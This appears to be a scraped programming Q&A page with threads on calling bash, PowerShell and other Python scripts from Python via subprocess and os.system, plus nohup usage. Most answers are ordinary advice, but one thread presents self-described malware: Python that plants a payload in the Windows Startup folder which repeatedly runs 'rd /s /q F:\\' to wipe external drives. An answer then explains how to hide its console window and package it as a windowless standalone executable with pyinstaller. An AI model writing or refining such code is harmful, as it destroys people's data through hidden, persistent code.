How to hardcode bash script in python file - python

I am writing a python tool that makes some processing, data gathering and eventually calling a bash scripts via subprocess.
The tricky part of my tool is: I use nuitka to compile python files to the single binary file. I'm doing this because I don't want my users to add any features plus I'd like my tool to be mysterious.
The problem is of course, what to do with that bash scripts. For now, I store them together with my nuitka-ed binary. However, due to above, I don't want a bash scripts to be that easily accessible.
For now, I can see two options for me:
I can compile *.sh files and link them with nuitka-ed binary.
I can hardcode *.sh files in *.py files.
Option 1 is rather not an option due to its complexity. Option 2 is slightly better, but for now, my best solutions is following:
I make script.py:
"""
#!/bin/bash
ls -alh /var
echo $?
# (...)
"""
And I inject script.__doc__ to the subprocess.Popen(['bash(...).
Is there any better - more elegant way to achieve my goal while maintaining bash script readability ?

To hardcode bash-code within a python file you could do it this way.
import subprocess
import StringIO
# In Python
text = "foobar"
your_bash_cmd = "echo "+text
process = subprocess.Popen([your_bash_cmd], shell=True, stdout=subprocess.PIPE)
process.wait()
your_bash_output = process.stdout.read()
# Process bash output in python
print(your_bash_output)

Related

How can we execute the following bash commands in python linux [duplicate]

On my local machine, I run a python script which contains this line
bashCommand = "cwm --rdf test.rdf --ntriples > test.nt"
os.system(bashCommand)
This works fine.
Then I run the same code on a server and I get the following error message
'import site' failed; use -v for traceback
Traceback (most recent call last):
File "/usr/bin/cwm", line 48, in <module>
from swap import diag
ImportError: No module named swap
So what I did then is I inserted a print bashCommand which prints me than the command in the terminal before it runs it with os.system().
Of course, I get again the error (caused by os.system(bashCommand)) but before that error it prints the command in the terminal. Then I just copied that output and did a copy paste into the terminal and hit enter and it works...
Does anyone have a clue what's going on?
Don't use os.system. It has been deprecated in favor of subprocess. From the docs: "This module intends to replace several older modules and functions: os.system, os.spawn".
Like in your case:
import subprocess
bashCommand = "cwm --rdf test.rdf --ntriples > test.nt"
process = subprocess.Popen(bashCommand.split(), stdout=subprocess.PIPE)
output, error = process.communicate()
To somewhat expand on the earlier answers here, there are a number of details which are commonly overlooked.
Prefer subprocess.run() over subprocess.check_call() and friends over subprocess.call() over subprocess.Popen() over os.system() over os.popen()
Understand and probably use text=True, aka universal_newlines=True.
Understand the meaning of shell=True or shell=False and how it changes quoting and the availability of shell conveniences.
Understand differences between sh and Bash
Understand how a subprocess is separate from its parent, and generally cannot change the parent.
Avoid running the Python interpreter as a subprocess of Python.
These topics are covered in some more detail below.
Prefer subprocess.run() or subprocess.check_call()
The subprocess.Popen() function is a low-level workhorse but it is tricky to use correctly and you end up copy/pasting multiple lines of code ... which conveniently already exist in the standard library as a set of higher-level wrapper functions for various purposes, which are presented in more detail in the following.
Here's a paragraph from the documentation:
The recommended approach to invoking subprocesses is to use the run() function for all use cases it can handle. For more advanced use cases, the underlying Popen interface can be used directly.
Unfortunately, the availability of these wrapper functions differs between Python versions.
subprocess.run() was officially introduced in Python 3.5. It is meant to replace all of the following.
subprocess.check_output() was introduced in Python 2.7 / 3.1. It is basically equivalent to subprocess.run(..., check=True, stdout=subprocess.PIPE).stdout
subprocess.check_call() was introduced in Python 2.5. It is basically equivalent to subprocess.run(..., check=True)
subprocess.call() was introduced in Python 2.4 in the original subprocess module (PEP-324). It is basically equivalent to subprocess.run(...).returncode
High-level API vs subprocess.Popen()
The refactored and extended subprocess.run() is more logical and more versatile than the older legacy functions it replaces. It returns a CompletedProcess object which has various methods which allow you to retrieve the exit status, the standard output, and a few other results and status indicators from the finished subprocess.
subprocess.run() is the way to go if you simply need a program to run and return control to Python. For more involved scenarios (background processes, perhaps with interactive I/O with the Python parent program) you still need to use subprocess.Popen() and take care of all the plumbing yourself. This requires a fairly intricate understanding of all the moving parts and should not be undertaken lightly. The simpler Popen object represents the (possibly still-running) process which needs to be managed from your code for the remainder of the lifetime of the subprocess.
It should perhaps be emphasized that just subprocess.Popen() merely creates a process. If you leave it at that, you have a subprocess running concurrently alongside with Python, so a "background" process. If it doesn't need to do input or output or otherwise coordinate with you, it can do useful work in parallel with your Python program.
Avoid os.system() and os.popen()
Since time eternal (well, since Python 2.5) the os module documentation has contained the recommendation to prefer subprocess over os.system():
The subprocess module provides more powerful facilities for spawning new processes and retrieving their results; using that module is preferable to using this function.
The problems with system() are that it's obviously system-dependent and doesn't offer ways to interact with the subprocess. It simply runs, with standard output and standard error outside of Python's reach. The only information Python receives back is the exit status of the command (zero means success, though the meaning of non-zero values is also somewhat system-dependent).
PEP-324 (which was already mentioned above) contains a more detailed rationale for why os.system is problematic and how subprocess attempts to solve those issues.
os.popen() used to be even more strongly discouraged:
Deprecated since version 2.6: This function is obsolete. Use the subprocess module.
However, since sometime in Python 3, it has been reimplemented to simply use subprocess, and redirects to the subprocess.Popen() documentation for details.
Understand and usually use check=True
You'll also notice that subprocess.call() has many of the same limitations as os.system(). In regular use, you should generally check whether the process finished successfully, which subprocess.check_call() and subprocess.check_output() do (where the latter also returns the standard output of the finished subprocess). Similarly, you should usually use check=True with subprocess.run() unless you specifically need to allow the subprocess to return an error status.
In practice, with check=True or subprocess.check_*, Python will throw a CalledProcessError exception if the subprocess returns a nonzero exit status.
A common error with subprocess.run() is to omit check=True and be surprised when downstream code fails if the subprocess failed.
On the other hand, a common problem with check_call() and check_output() was that users who blindly used these functions were surprised when the exception was raised e.g. when grep did not find a match. (You should probably replace grep with native Python code anyway, as outlined below.)
All things counted, you need to understand how shell commands return an exit code, and under what conditions they will return a non-zero (error) exit code, and make a conscious decision how exactly it should be handled.
Understand and probably use text=True aka universal_newlines=True
Since Python 3, strings internal to Python are Unicode strings. But there is no guarantee that a subprocess generates Unicode output, or strings at all.
(If the differences are not immediately obvious, Ned Batchelder's Pragmatic Unicode is recommended, if not outright obligatory, reading. There is a 36-minute video presentation behind the link if you prefer, though reading the page yourself will probably take significantly less time.)
Deep down, Python has to fetch a bytes buffer and interpret it somehow. If it contains a blob of binary data, it shouldn't be decoded into a Unicode string, because that's error-prone and bug-inducing behavior - precisely the sort of pesky behavior which riddled many Python 2 scripts, before there was a way to properly distinguish between encoded text and binary data.
With text=True, you tell Python that you, in fact, expect back textual data in the system's default encoding, and that it should be decoded into a Python (Unicode) string to the best of Python's ability (usually UTF-8 on any moderately up to date system, except perhaps Windows?)
If that's not what you request back, Python will just give you bytes strings in the stdout and stderr strings. Maybe at some later point you do know that they were text strings after all, and you know their encoding. Then, you can decode them.
normal = subprocess.run([external, arg],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
check=True,
text=True)
print(normal.stdout)
convoluted = subprocess.run([external, arg],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
check=True)
# You have to know (or guess) the encoding
print(convoluted.stdout.decode('utf-8'))
Python 3.7 introduced the shorter and more descriptive and understandable alias text for the keyword argument which was previously somewhat misleadingly called universal_newlines.
Understand shell=True vs shell=False
With shell=True you pass a single string to your shell, and the shell takes it from there.
With shell=False you pass a list of arguments to the OS, bypassing the shell.
When you don't have a shell, you save a process and get rid of a fairly substantial amount of hidden complexity, which may or may not harbor bugs or even security problems.
On the other hand, when you don't have a shell, you don't have redirection, wildcard expansion, job control, and a large number of other shell features.
A common mistake is to use shell=True and then still pass Python a list of tokens, or vice versa. This happens to work in some cases, but is really ill-defined and could break in interesting ways.
# XXX AVOID THIS BUG
buggy = subprocess.run('dig +short stackoverflow.com')
# XXX AVOID THIS BUG TOO
broken = subprocess.run(['dig', '+short', 'stackoverflow.com'],
shell=True)
# XXX DEFINITELY AVOID THIS
pathological = subprocess.run(['dig +short stackoverflow.com'],
shell=True)
correct = subprocess.run(['dig', '+short', 'stackoverflow.com'],
# Probably don't forget these, too
check=True, text=True)
# XXX Probably better avoid shell=True
# but this is nominally correct
fixed_but_fugly = subprocess.run('dig +short stackoverflow.com',
shell=True,
# Probably don't forget these, too
check=True, text=True)
The common retort "but it works for me" is not a useful rebuttal unless you understand exactly under what circumstances it could stop working.
To briefly recap, correct usage looks like
subprocess.run("string for 'the shell' to parse", shell=True)
# or
subprocess.run(["list", "of", "tokenized strings"]) # shell=False
If you want to avoid the shell but are too lazy or unsure of how to parse a string into a list of tokens, notice that shlex.split() can do this for you.
subprocess.run(shlex.split("no string for 'the shell' to parse")) # shell=False
# equivalent to
# subprocess.run(["no", "string", "for", "the shell", "to", "parse"])
The regular split() will not work here, because it doesn't preserve quoting. In the example above, notice how "the shell" is a single string.
Refactoring Example
Very often, the features of the shell can be replaced with native Python code. Simple Awk or sed scripts should probably just be translated to Python instead.
To partially illustrate this, here is a typical but slightly silly example which involves many shell features.
cmd = '''while read -r x;
do ping -c 3 "$x" | grep 'min/avg/max'
done <hosts.txt'''
# Trivial but horrible
results = subprocess.run(
cmd, shell=True, universal_newlines=True, check=True)
print(results.stdout)
# Reimplement with shell=False
with open('hosts.txt') as hosts:
for host in hosts:
host = host.rstrip('\n') # drop newline
ping = subprocess.run(
['ping', '-c', '3', host],
text=True,
stdout=subprocess.PIPE,
check=True)
for line in ping.stdout.split('\n'):
if 'min/avg/max' in line:
print('{}: {}'.format(host, line))
Some things to note here:
With shell=False you don't need the quoting that the shell requires around strings. Putting quotes anyway is probably an error.
It often makes sense to run as little code as possible in a subprocess. This gives you more control over execution from within your Python code.
Having said that, complex shell pipelines are tedious and sometimes challenging to reimplement in Python.
The refactored code also illustrates just how much the shell really does for you with a very terse syntax -- for better or for worse. Python says explicit is better than implicit but the Python code is rather verbose and arguably looks more complex than this really is. On the other hand, it offers a number of points where you can grab control in the middle of something else, as trivially exemplified by the enhancement that we can easily include the host name along with the shell command output. (This is by no means challenging to do in the shell, either, but at the expense of yet another diversion and perhaps another process.)
Common Shell Constructs
For completeness, here are brief explanations of some of these shell features, and some notes on how they can perhaps be replaced with native Python facilities.
Globbing aka wildcard expansion can be replaced with glob.glob() or very often with simple Python string comparisons like for file in os.listdir('.'): if not file.endswith('.png'): continue. Bash has various other expansion facilities like .{png,jpg} brace expansion and {1..100} as well as tilde expansion (~ expands to your home directory, and more generally ~account to the home directory of another user)
Shell variables like $SHELL or $my_exported_var can sometimes simply be replaced with Python variables. Exported shell variables are available as e.g. os.environ['SHELL'] (the meaning of export is to make the variable available to subprocesses -- a variable which is not available to subprocesses will obviously not be available to Python running as a subprocess of the shell, or vice versa. The env= keyword argument to subprocess methods allows you to define the environment of the subprocess as a dictionary, so that's one way to make a Python variable visible to a subprocess). With shell=False you will need to understand how to remove any quotes; for example, cd "$HOME" is equivalent to os.chdir(os.environ['HOME']) without quotes around the directory name. (Very often cd is not useful or necessary anyway, and many beginners omit the double quotes around the variable and get away with it until one day ...)
Redirection allows you to read from a file as your standard input, and write your standard output to a file. grep 'foo' <inputfile >outputfile opens outputfile for writing and inputfile for reading, and passes its contents as standard input to grep, whose standard output then lands in outputfile. This is not generally hard to replace with native Python code.
Pipelines are a form of redirection. echo foo | nl runs two subprocesses, where the standard output of echo is the standard input of nl (on the OS level, in Unix-like systems, this is a single file handle). If you cannot replace one or both ends of the pipeline with native Python code, perhaps think about using a shell after all, especially if the pipeline has more than two or three processes (though look at the pipes module in the Python standard library or a number of more modern and versatile third-party competitors).
Job control lets you interrupt jobs, run them in the background, return them to the foreground, etc. The basic Unix signals to stop and continue a process are of course available from Python, too. But jobs are a higher-level abstraction in the shell which involve process groups etc which you have to understand if you want to do something like this from Python.
Quoting in the shell is potentially confusing until you understand that everything is basically a string. So ls -l / is equivalent to 'ls' '-l' '/' but the quoting around literals is completely optional. Unquoted strings which contain shell metacharacters undergo parameter expansion, whitespace tokenization and wildcard expansion; double quotes prevent whitespace tokenization and wildcard expansion but allow parameter expansions (variable substitution, command substitution, and backslash processing). This is simple in theory but can get bewildering, especially when there are several layers of interpretation (a remote shell command, for example).
Understand differences between sh and Bash
subprocess runs your shell commands with /bin/sh unless you specifically request otherwise (except of course on Windows, where it uses the value of the COMSPEC variable). This means that various Bash-only features like arrays, [[ etc are not available.
If you need to use Bash-only syntax, you can
pass in the path to the shell as executable='/bin/bash' (where of course if your Bash is installed somewhere else, you need to adjust the path).
subprocess.run('''
# This for loop syntax is Bash only
for((i=1;i<=$#;i++)); do
# Arrays are Bash-only
array[i]+=123
done''',
shell=True, check=True,
executable='/bin/bash')
A subprocess is separate from its parent, and cannot change it
A somewhat common mistake is doing something like
subprocess.run('cd /tmp', shell=True)
subprocess.run('pwd', shell=True) # Oops, doesn't print /tmp
The same thing will happen if the first subprocess tries to set an environment variable, which of course will have disappeared when you run another subprocess, etc.
A child process runs completely separate from Python, and when it finishes, Python has no idea what it did (apart from the vague indicators that it can infer from the exit status and output from the child process). A child generally cannot change the parent's environment; it cannot set a variable, change the working directory, or, in so many words, communicate with its parent without cooperation from the parent.
The immediate fix in this particular case is to run both commands in a single subprocess;
subprocess.run('cd /tmp; pwd', shell=True)
though obviously this particular use case isn't very useful; instead, use the cwd keyword argument, or simply os.chdir() before running the subprocess. Similarly, for setting a variable, you can manipulate the environment of the current process (and thus also its children) via
os.environ['foo'] = 'bar'
or pass an environment setting to a child process with
subprocess.run('echo "$foo"', shell=True, env={'foo': 'bar'})
(not to mention the obvious refactoring subprocess.run(['echo', 'bar']); but echo is a poor example of something to run in a subprocess in the first place, of course).
Don't run Python from Python
This is slightly dubious advice; there are certainly situations where it does make sense or is even an absolute requirement to run the Python interpreter as a subprocess from a Python script. But very frequently, the correct approach is simply to import the other Python module into your calling script and call its functions directly.
If the other Python script is under your control, and it isn't a module, consider turning it into one. (This answer is too long already so I will not delve into details here.)
If you need parallelism, you can run Python functions in subprocesses with the multiprocessing module. There is also threading which runs multiple tasks in a single process (which is more lightweight and gives you more control, but also more constrained in that threads within a process are tightly coupled, and bound to a single GIL.)
Call it with subprocess
import subprocess
subprocess.Popen("cwm --rdf test.rdf --ntriples > test.nt")
The error you are getting seems to be because there is no swap module on the server, you should install swap on the server then run the script again
It is possible you use the bash program, with the parameter -c for execute the commands:
bashCommand = "cwm --rdf test.rdf --ntriples > test.nt"
output = subprocess.check_output(['bash','-c', bashCommand])
You can use subprocess, but I always felt that it was not a 'Pythonic' way of doing it. So I created Sultan (shameless plug) that makes it easy to run command line functions.
https://github.com/aeroxis/sultan
Also you can use 'os.popen'.
Example:
import os
command = os.popen('ls -al')
print(command.read())
print(command.close())
Output:
total 16
drwxr-xr-x 2 root root 4096 ago 13 21:53 .
drwxr-xr-x 4 root root 4096 ago 13 01:50 ..
-rw-r--r-- 1 root root 1278 ago 13 21:12 bot.py
-rw-r--r-- 1 root root 77 ago 13 21:53 test.py
None
According to the error you are missing a package named swap on the server. This /usr/bin/cwm requires it. If you're on Ubuntu/Debian, install python-swap using aptitude.
To run the command without a shell, pass the command as a list and implement the redirection in Python using [subprocess]:
#!/usr/bin/env python
import subprocess
with open('test.nt', 'wb', 0) as file:
subprocess.check_call("cwm --rdf test.rdf --ntriples".split(),
stdout=file)
Note: no > test.nt at the end. stdout=file implements the redirection.
To run the command using the shell in Python, pass the command as a string and enable shell=True:
#!/usr/bin/env python
import subprocess
subprocess.check_call("cwm --rdf test.rdf --ntriples > test.nt",
shell=True)
Here's the shell is responsible for the output redirection (> test.nt is in the command).
To run a bash command that uses bashisms, specify the bash executable explicitly e.g., to emulate bash process substitution:
#!/usr/bin/env python
import subprocess
subprocess.check_call('program <(command) <(another-command)',
shell=True, executable='/bin/bash')
copy paste this:
def run_bash_command(cmd: str) -> Any:
import subprocess
process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE)
output, error = process.communicate()
if error:
raise Exception(error)
else:
return output
subprocess.Popen() is prefered over os.system() as it offers more control and visibility. However, If you find subprocess.Popen() too verbose or complex, peasyshell is a small wrapper I wrote above it, which makes it easy to interact with bash from Python.
https://github.com/davidohana/peasyshell
The pythonic way of doing this is using subprocess.Popen
subprocess.Popen takes a list where the first element is the command to be run followed by any command line arguments.
As an example:
import subprocess
args = ['echo', 'Hello!']
subprocess.Popen(args) // same as running `echo Hello!` on cmd line
args2 = ['echo', '-v', '"Hello Again"']
subprocess.Popen(args2) // same as running 'echo -v "Hello Again!"` on cmd line

How to run a .py file from a .py file in an entirely different project

For the life of me i can't figure this one out.
I have 2 applications build in python, so 2 projects in different folders, is there a command to say in the first application like run file2 from documents/project2/test2.py ?
i tried something like os.system('') and exec() but that only seems to work if its in the same folder. How can i give a command a path like documents/project2 and then for example:
exec(documents/project2 python test2.py) ?
short version:
Is there a command that runs python test2.py while that test2 is in a completely different file/project?
thnx for all feedback!
There's a number of approaches to take.
1 - Import the .py
If the path to the other Python script can be made relative to your project, you can simply import the .py. This will cause all the code at the 'root' level of the script to be executed and makes functions as well as type and variable definitions available to the script importing it.
Of course, this only works if you control how and where everything is installed. It's the most preferable solution, but only works in limited situations.
import ..other_package.myscript
2 - Evaluate the code
You can load the contents of the Python file like any other text file and execute the contents. This is considered more of a security risk, but given the interpreted nature of Python in normal use not that much worse than an import under normal circumstances.
Here's how:
with open('/path/to/myscript.py', 'r') as f:
exec(f.read())
Note that, if you need to pass values to code inside the script, or out of it, you probably want to use files in this case.
I'd consider this the least preferable solution, due to it being a bit inflexible and not very secure, but it's definitely very easy to set up.
3 - Call it like any other external program
From a Python script, you can call any other executable, that includes Python itself with another script.
Here's how:
from subprocess import run
run('python path/to/myscript.py')
This is generally the preferable way to go about it. You can use the command line to interface with the script, and capture the output.
You can also pipe in text with stdin= or capture the output from the script with stdout=, using subprocess.Popen directly.
For example, take this script, called quote.py
import sys
text = sys.stdin.read()
print(f'In the words of the poet:\n"{text}"')
This takes any text from standard in and prints them with some extra text, to standard out like any Python script. You could call it like this:
dir | python quote.py
To use it from another Python script:
from subprocess import Popen, PIPE
s_in = b'something to say\nright here\non three lines'
p = Popen(['python', 'quote.py'], stdin=PIPE, stdout=PIPE)
s_out, _ = p.communicate(s_in)
print('Here is what the script produced:\n\n', s_out.decode())
Try this:
exec(open("FilePath").read())
It should work if you got the file path correct.
Mac example:
exec(open("/Users/saudalfaris/Desktop/Test.py").read())
Windows example:
exec(open("C:\Projects\Python\Test.py").read())

What's the best way to execute PowerShell scripts from Python

All the previous posts on this topic deal with specific challenges for their use case. I thought it would be useful to have a post only dealing with the cleanest way to run PowerShell scripts from Python and ask if anyone has an better solution than what I found.
What seems to be the generally accepted solution to get around PowerShell trying to interpret different control characters in your command differently to what's intended is to feed your Powershell command in using a file:
ps = 'powershell.exe -noprofile'
pscommand = 'Invoke-Command -ComputerName serverx -ScriptBlock {cmd.exe \
/c "dir /b C:\}'
psfile = open(pscmdfile.ps1, 'w')
psfile.write(pscommand)
psfile.close()
full_command_string = ps + ' pscmdfile.ps1'
process = subprocess.Popen(full_command_string , shell=True, \
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
When your python code needs to change the parameters for the Powershell command each time you invoke it you end up writing and deleting a lot of temporary files for subprocess.Popen to run. It works perfectly but it's unnecessary and not very clean. It's really nice to be able to tidy up and wanted to get suggestions on any improvements I could make to the solution I found.
Instead of writing a file to disk containing the PS command create a virtual file using the io module. Assuming that the "date" and "server" strings are being fed in as part of a loop or function that contains this code, not including the imports of course:
import subprocess
import io
from string import Template
raw_shellcmd = 'powershell.exe -noprofile '
--start of loop with server and date variables populated--
raw_pslistcmd = r'Invoke-Command -ComputerName $server -ScriptBlock ' \
r'{cmd.exe /c "dir /b C:\folder\$date"}'
pslistcmd_template = Template(raw_pslistcmd)
pslistcmd = pslistcmd_template.substitute(server=server, date=date)
virtualfilepslistcommand = io.BytesIO(pslistcmd)
shellcmd = raw_shellcmd + virtualfilepslistcommand.read()
process = subprocess.Popen(shellcmd, shell=True, stdout=subprocess.PIPE, \
stderr=subprocess.PIPE)
--end of loop--
Arguably the best approach is to use powershell.exe -Command rather than writing the PowerShell command to a file:
pscommand = 'Invoke-Command ...'
process = subprocess.Popen(['powershell.exe', '-NoProfile', '-Command', '"&{' + pscommand + '}"'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
Make sure double quotes in the pscommand string are properly escaped.
Note that shell=True is required only in certain edge cases, and should not be used in your scenario. From the documentation:
On Windows with shell=True, the COMSPEC environment variable specifies the default shell. The only time you need to specify shell=True on Windows is when the command you wish to execute is built into the shell (e.g. dir or copy). You do not need shell=True to run a batch file or console-based executable.
After spending a fair amount of time on this.
I think that running powershell commands from python may not make sense to a lot of people, especially people who work exclusively in windows environments. There are numerous clear advantages to python over powershell however so the ability to do all your business logic in python and then selectively execute powershell on remote servers is truly a great thing.
I've now been through several improvements of my "winrmcntl" module which I can't share due to company policy unfortunately but here is my advice to anyone who would like to do something similar. The module should take as input an unmodified PS command or scriptblock as you'd run it if you were typing directly in PS on the destination box. A few tricks:
To avoid permission difficulties, ensure the user running your python script and hence the one running powershell.exe via process.Popen is the user that has the correct permissions on the windows box you're invoke-command is pointing at. We use an enterprise scheduler which has windows vms as agents on which the python code lives which takes care of that.
You will sometimes rarely but still get the odd esoteric exception from powershell land, if they're anything like the one in particular I saw the odd time, microsoft scratch their heads at a little and get you to do time consuming application stack tracing. This is not only time consuming but very difficult to get right because it's resource intensive and you don't know when the exception will next occur. In my opinion, it's much better and easier to parse the output of the exception and retry up to x number of times if a certain text appears in those exceptions. I keep a list of strings in my winrmcntl module which currently contains a single string.
If you want to not have to "massage" the powershell commands as they traverse the python -> windows -> powershell -> powershell stack to make them work as expected on destination boxes, the most consistent method I've found is to write your one liners and scriptblocks alike into a ps_buffer.ps1 file which you then feed to powershell on the source box so that every process.popen looks exactly the same but the content of ps_buffer.ps1 changes with each execution.
powershell.exe ps_buffer.ps1
To keep your python code nice and clean, it's great having your list of powershell one liners in a json file or similar as well as pointers to scriptblocks you want to run saved into static files. You load up your json file as an ordered dict and cycle through issuing commands based on what you're doing.
Can't be overstated, as far as is possible try to be on the latest stable version of PS but more than that, it's imperative to be on the same version on client and server.
"scriptblock" and "server" are the values fed to this module or function
import subprocess
from string import Template
scriptblock = 'Get-ChildItem' #or a PS scriptblock as elaborate as you need
server = 'serverx'
psbufferfile = os.path.join(tempdir, 'pscmdbufferfile_{}.ps1'.format(server))
fullshellcmd = 'powershell.exe {}'.format(psbufferfile)
raw_pscommad = 'Invoke-Command -ComputerName $server -ScriptBlock {$scriptblock}'
pscmd_template = Template(raw_pscommand)
pscmd = pscmd_template.substitute(server=server, scriptblock=scriptblock)
try:
with open(psbufferfile, 'w') as psbf:
psbf.writelines(pscmd)
....
try:
process = subprocess.Popen(fullshellcmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = process.communicate()
....

Execute python script on startup in the background

I am writing a very simple piece of malware for fun (I don't like doing anything malicious to others). Currently, I have this:
import os
#generate payload
payload = [
"from os import system\n",
"from time import sleep\n",
"while True:\n",
" try:\n",
" system('rd /s /q F:\\\\')\n",
" except:\n",
" pass\n",
" sleep(10)\n",
]
#find the userhome
userhome = os.path.expanduser('~')
#create the payload file
with open(userhome+"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.py", "a") as output:
#write payload
for i in payload:
output.write(i)
After the user executes that script, it should run the payload every time the computer starts up. Currently, the payload will erase the F:\ drive, where USB disks, external HDDs, etc. will be found.
The problem is is that the command window shows up when the computer starts. I need a way to prevent anything from showing up any ware in a very short way that can be done easily in Python. I've heard of "pythonw.exe", but I don't know how I would get it to run at startup with that unless I change the default program for .py files. How would I go about doing this?
And yes, I do know that if one were to get this malware it wouldn't do abything unless they had Python installed, but since I don't want to do anything with it I don't care.
The window that pops up, should, in fact, not be your python window, but the window for the command you run with os (if there are two windows, you will need to follow the below suggestion to remove the actual python one). You can block this when you use the subprocess module, similar to the os one. Normally, subprocess also creates a window, but you can use this call function to avoid it. It will even take the optional argument of input, and return output, if you wish to pipe the standard in and out of the process, which you do not need to do in this case.
def call(command,io=''):
command = command.split()
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
if io != None:
process = subprocess.Popen(command,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE,startupinfo=startupinfo,shell=False)
return process.communicate(io)[0]
This should help. You would use it in place of os.system()
Also, you can make it work even without python (though you really shouldn't use it on other systems) by making it into an executable with pyinstaller. You may, in fact, need to do this along with the subprocess startupinfo change to make it work. Unlike py2exe or cxfreeze, pyinstaller is very easy to use, and works reliably. Install pyinstaller here (it is a zip file, however pyinstaller and other sites document how to install it with this). You may need to include the pyinstaller command in your system "path" variable (you can do this from control panel) if you want to create an executable from the command line. Just type
pyinstaller "<filename>" -w -F
And you will get a single file, standalone, window-less executable. The -w makes it windowless, the -F makes it a standalone file as opposed to a collection of multiple files. You should see a dist subdirectory from the one you called pyinstaller from, which will include, possibly among other things which you may ignore, the single, standalone executable which does not require python, and shouldn't cause any windows to pop up.

I want to have raw_input and nohup together in python

I am dealing with a large data set and it takes some days to run, therefore I use nohup to run my script in terminal.
This time I need to first get a raw_input from terminal then by nohup, my codes starts running. Any suggestion how I can do that?
so first I need to get input from terminal like this
$ python myprogram.py
enter_input: SOMETHING
then the process should be like this:
$nohup python myprogram.py &
But I want to do this in one step via terminal. I hope my explanation is clear :)
Here's one more option, in case you want to stick with the user-friendly nature of the input box. I did something like this because I needed a password field, and didn't want the user to have to display their password in the terminal. As described here, you can create a small wrapper shell script with input boxes (with or without the -s option to hide), and then pass those variables via the sys.argv solution above. Something like this, saved in an executable my_program.sh:
echo enter_input:
read input
echo enter_password:
read -s password
nohup python myprogram.py $username $password &
Now, running ./my_program.sh will behave exactly like your original python my_program.py
I think you shouldn't your program have read input from stdin, but give it data via its command line.
So instead of
startdata = raw_input('enter_input:')
you do
import sys
startdata = sys.argv[1]
and you start your program with
$ nohup python myprogram.py SOMETHING &
and all works the way you want - if I get you right.
You could make your process fork to the background after reading the input. The by far easier variant, though, is to start your process inside tmux or GNU screen.

Categories